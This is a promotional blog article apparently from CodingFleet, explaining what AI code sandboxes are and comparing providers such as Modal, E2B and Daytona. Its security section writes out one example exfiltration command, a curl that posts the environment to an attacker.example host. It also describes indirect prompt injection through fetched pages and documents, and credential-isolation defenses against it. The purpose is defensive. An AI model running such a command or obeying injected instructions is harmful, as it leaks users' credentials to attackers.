Ask any AI to write a function and it will, instantly. Ask it to run that function — install the dependency, fetch a CSV from a URL, plot the result, spot the bug, fix it, and try again — and you've crossed a line the model cannot cross on its own.
The model lives in a chat window. The work happens somewhere else. That "somewhere else" is a sandbox — an isolated, short-lived, fully programmable computer that an AI agent owns for the duration of a task. It is the most important piece of infrastructure in agentic AI, and the most underestimated. Frontier models get the headlines. Sandboxes are the reason those models can actually do things.
This article explains what sandboxes are, why agents cannot function without them, how to think about choosing one, and where the industry is heading. It's written for developers who use AI coding tools — not infrastructure engineers — and every claim is backed by research.
TL;DR. A sandbox gives an AI agent a real computer to work with: a filesystem, a shell, network access, and state that persists across tool calls. Without one, even the smartest model is just a chatbot — it can suggest code but can't verify it. The 2026 market includes managed platforms like Modal (which powers CodingFleet's sandboxes), E2B, Daytona, and Cloudflare, plus self-hosted options like Docker Sandboxes. The right choice depends on what your agent is allowed to touch — and what you can't let it break.
The difference between a chatbot and an agent is a sandbox
A 2023-era chatbot was stateless. You sent text in, the model sent text out. The only "side effect" was the response. There was nothing for the model to do, so it didn't need a place to do it.
That changed when models started being wired to real systems. Once an LLM can write to a file, call an API, or run a command, it stops being a function from prompt to response. It becomes a loop:
- Plan — look at the goal, decide what to do next.
- Act — call a tool, run a command, fetch a resource.
- Observe — read the output, the error, the result.
- Re-plan — decide what to do next based on what just happened.
Steps 1 and 4 are pure inference. They happen in the model's context window. But steps 2 and 3 need a computer. Specifically, they need five things:
| Property | Why agents need it |
|---|---|
| A real filesystem | Agents write code, save plots, clone repos, edit configs. They need mkdir, cp, git — not key-value blobs in a prompt. |
| A shell | The agent decides to run python train.py or npm install or ffmpeg. It needs a place to run processes. |
| Network access | Fetching data, calling APIs, installing packages — all require outbound connectivity. |
| State persistence | An agent that loses its filesystem between tool calls loops forever. The sandbox keeps state for the life of the task. |
| Isolation | The agent runs code we didn't write, from a model we can't fully control. It must not touch the host or other users. |
Skip any one of these and you don't have an agent. You have a confused chatbot. A model that writes Python but can't execute it is a code reviewer. A model that runs a command but can't see its output is a coin flip. The sandbox is the substrate that turns inference into action.
Where you've already seen this. ChatGPT's "Code Interpreter," Claude's file analysis, and Gemini's code execution are all built-in sandboxes. They're why those products can run Python and return charts instead of just suggesting code. The sandboxes we're talking about here are the external kind — the ones that power Cursor's background agents, Devin, Claude Code, and CodingFleet's multi-model chat. They're what you use when you want any model, not just the one in a specific chat product, to have a real computer.
What a sandbox actually is
The word predates AI. It comes from 1990s security engineering: a sandbox is any environment where untrusted code runs without being able to affect anything outside. Java applets, browser tabs, mobile apps — they all run in sandboxes.
An AI code sandbox is the same idea, repurposed for the agent era. It's a Linux machine — usually a container or lightweight VM — that an agent controls through an API. The agent can execute commands, read and write files, make network requests, install packages, and persist state between tool calls. What it can't do is escape into the host, touch other users' data, or survive past its timeout.
The key difference from a regular server: the user is an AI, not a human. There's no terminal, no "OK" button on a permissions dialog, no human reading the error message. The sandbox has to be programmable end-to-end, observable in real time, and recoverable from any state the model wanders into.
The sandbox provider landscape in 2026
The market has consolidated into a handful of well-defined options. Here's what matters for each, at a glance:
| Provider | Best for | Isolation | GPU | Session limit | ~Cost/hr |
|---|---|---|---|---|---|
| Modal | GPU workloads, elastic scale | gVisor | L4→H200 | Unlimited | $0.12 |
| E2B | Strong security, clean SDK | Firecracker µVM | — | 24 hours | $0.08 |
| Daytona | Persistent workspaces | Docker (Kata opt.) | Optional | Unlimited | $0.08 |
| Cloudflare | Edge, fastest cold starts | V8 isolates | — | 30 min | $0.09 |
| Vercel | Already on Vercel | Firecracker µVM | — | 5 hours | $0.15 |
| Northflank | Bring-your-own-cloud | Multi (Firecracker/gVisor/Kata) | L4→H200 | Unlimited | $0.03 |
| Blaxel | Perpetual state, low latency | Custom µVM | — | Unlimited | Contact |
| Docker SB | Local, free, familiar | µVM (per-sandbox) | Host GPU | Configurable | Free |
Pricing from public rate cards as of May 2026. Verify on each provider's site. Sources: vendor docs and Northflank's comparison.
The cold-start picture tells its own story:
And the fundamental tradeoff every provider faces — stronger isolation costs more:
The capability profiles show that no provider wins on every axis:
Modal wins on GPU and scale. E2B wins on isolation and SDK quality. Cloudflare wins on cold start and edge presence. Blaxel wins on stateful resume latency. Pick the provider that matches your agent's dominant need — not the one with the most blog posts.
The security elephant in the room
An agent that can write code and hit the network can also leak the credentials you gave it. The obvious pattern — os.environ["GITHUB_TOKEN"] — works until a prompt-injected comment on a webpage convinces the model to curl https://attacker.example/leak -d "$(env)". This isn't theoretical: Aikido researchers found 30+ such vulnerabilities in AI coding tools in late 2025.
The defenses, in order of maturity:
- Scrubbed env vars — set the key, strip it from
envand/proc. Stops naive attacks; bypassed by anything clever. - Sidecar proxies — a small auth broker sits alongside the sandbox. The agent asks the broker for access; the credential never enters the agent's environment. This is what Infisical's Agent Vault and Anthropic's Claude Code sandboxing use.
- Short-lived tokens — per-session, per-scope OAuth tokens valid for 15 minutes. If compromised, the window is tiny.
- Identity-based access — no bearer tokens at all. The agent authenticates as a workload identity. This is where the industry is heading but few have arrived.
The honest state of the art: defenses 1 and 2 are production-ready. Defense 3 is real but operationally heavy. Defense 4 is mostly aspiration. Until identity-based access is the norm, give your agent the minimum credentials for the minimum time.
What sandboxes don't protect against. A sandbox limits blast radius. It doesn't stop a compromised model from exfiltrating data through an allowed endpoint, modifying files, or burning API credits. As Anthropic's engineering team puts it: effective sandboxing requires both filesystem and network isolation, and even then, you need a human in the loop for high-impact actions. Sandboxes are necessary. They are not sufficient.
The single biggest change in the threat model between 2024 and 2026 is the rise of indirect prompt injection. Your agent doesn't just trust the model — it trusts web pages it fetches, GitHub issues, documentation sites, uploaded PDFs, and search results. Any of those can contain instructions the model will follow. Modal, E2B, and the better-managed platforms now support egress allowlists — the sandbox can only talk to approved domains. This is the single most valuable security feature on the market, and the one most often skipped by teams building their own infrastructure.
How this works in a product like CodingFleet
Most of the conversation so far has been about infrastructure. Let's pull the camera back to the product layer — because that's where most developers actually encounter a sandbox for the first time.
CodingFleet sits on top of a Modal-powered sandbox and exposes it through a chat interface, but with one architectural twist: the same sandbox is wired to 20+ large language models from OpenAI, Anthropic, Google, Meta, DeepSeek, xAI, Mistral, and Qwen. You can switch between models mid-conversation, and every model gets the same tools: code execution, file upload/download, web search, sub-agents, and parallel execution.
That's the non-obvious part. Normally, a sandbox is married to a single model. By giving every model the same sandbox tools, CodingFleet lets Claude spawn a sub-agent that uses GPT-5.5 to write a function, which Qwen Coder then reviews, while the orchestrator runs the tests. The sandbox is the shared surface area; the models are interchangeable.
The practical workflow: you describe what you want. CodingFleet spawns a sandbox. The model writes a plan, executes it, fetches data from the internet, runs the code, and returns artifacts — charts, PDFs, CSVs, generated code. Drop a GitHub PAT into the prompt and the model commits to your repo. The credential lives only for the session, routed through CodingFleet's proxy, never appearing in the model's context. Same pattern works for any SaaS API.
This is the most natural way to encounter a sandbox in 2026: not as infrastructure you configure, but as a capability the product provides. The user sees "I asked the AI to do a thing, and it did the thing, with files and an internet connection and a real computer behind it."
Try CodingFleet's sandbox for free →
How to pick a sandbox: a decision tree
Start with one question: what's the worst thing the agent could do?
| Your worst case | What to pick |
|---|---|
| 💰 Billing shock | Cloudflare, Vercel, or E2B free tier. Optimize for cold start and SDK quality. |
| 🔓 Data exfiltration | E2B, Blaxel, or Northflank with BYOC. You need µVM isolation + egress allowlist. Avoid containers. |
| 📋 Regulatory fine | Northflank BYOC or self-hosted Docker Sandboxes. Must run in your own VPC with audit logs. |
| ⏱️ Missing latency SLA | Blaxel (25ms standby resume). E2B and Modal resume paused sandboxes but with longer warm-up. |
| 🧠 Can't do ML work | Modal (default for GPU agents) or Northflank. E2B, Cloudflare, Vercel, and Blaxel don't offer GPUs. |
| 👤 Not building — using | Skip the decision. Use CodingFleet, Cursor, or Devin. The sandbox is a feature, not a choice. |
Where this is going
Three trends to watch:
1. MicroVMs will become the default. Docker's move to microVM isolation in Docker Sandboxes is the most significant shift. For the first time, a developer gets hardware-grade isolation with the familiar docker run workflow. The "container vs VM" debate will look as dated in two years as "VM vs bare metal" looks today.
2. Sandboxes will get their own filesystem. Current sandbox storage is a thin wrapper over block devices. The next generation — see Turso's AgentFS — is purpose-built for agents: filesystem, key-value store, and tool-call history in one SQLite-backed abstraction. An agent that boots into a filesystem that remembers its last session is qualitatively different from one that starts from scratch every time.
3. Credentials will move from runtime to identity. Bearer tokens in environment variables are a 2023 pattern. By 2028, the default will be workload identity: the agent authenticates as itself, and the credential is never a string. Until then, the sidecar proxy pattern is the best we have.
FAQ
What is a code sandbox?
An isolated computer — usually a container or lightweight VM — where an AI agent can execute code, read/write files, and access the network without touching anything outside the boundary.
Why can't my AI just run code on my laptop?
It can, but the model has the same access you do — your files, SSH keys, browser cookies. One prompt injection away from an incident. A sandbox limits the blast radius.
Is ChatGPT's Code Interpreter a sandbox?
Yes — a built-in one. It's a short-lived Linux VM the model owns for the session. Claude's file analysis and Gemini's code execution work the same way.
What's the difference between Modal, E2B, and Daytona?
Modal: serverless, GPU-capable, gVisor isolation, Python-native. E2B: strongest isolation (Firecracker microVMs), cleanest SDK, 24h session cap. Daytona: persistent workspaces that survive between sessions, Docker-based with optional Kata isolation.
How much does running an agent on a sandbox cost?
A typical 1-vCPU, 2 GB RAM sandbox: $0.03–$0.15/hour. A coding session that completes a real task usually burns 5–30 minutes of sandbox time — $0.005–$0.075. The LLM tokens almost always cost more.
Can sandboxes stop prompt injection?
No. A sandbox limits what a compromised model can reach. Egress allowlists, credential proxies, and human-in-the-loop checkpoints are the actual defenses. Sandboxes are the table stakes; the policy on top is the real security.
Sandboxes are the unglamorous foundation of agentic AI. The model is the brain, the prompt is the input, the tools are the limbs — and the sandbox is the body that gives the limbs something to stand on. If you're building, buy from a provider that has thought hard about the isolation layer. If you're using, pick a product that's already made the tradeoffs for you.
Try CodingFleet's sandbox with 20+ models, free →
Sources & further reading: Firecracker · gVisor · Anthropic: Claude Code Sandboxing · Anthropic: Code execution with MCP · Modal · E2B · Daytona · Northflank pricing comparison · Blaxel · Docker Sandboxes · Infisical Agent Vault · Turso AgentFS · Apiiro: Code execution risks in agentic AI · NVIDIA: Sandboxing agentic workflows.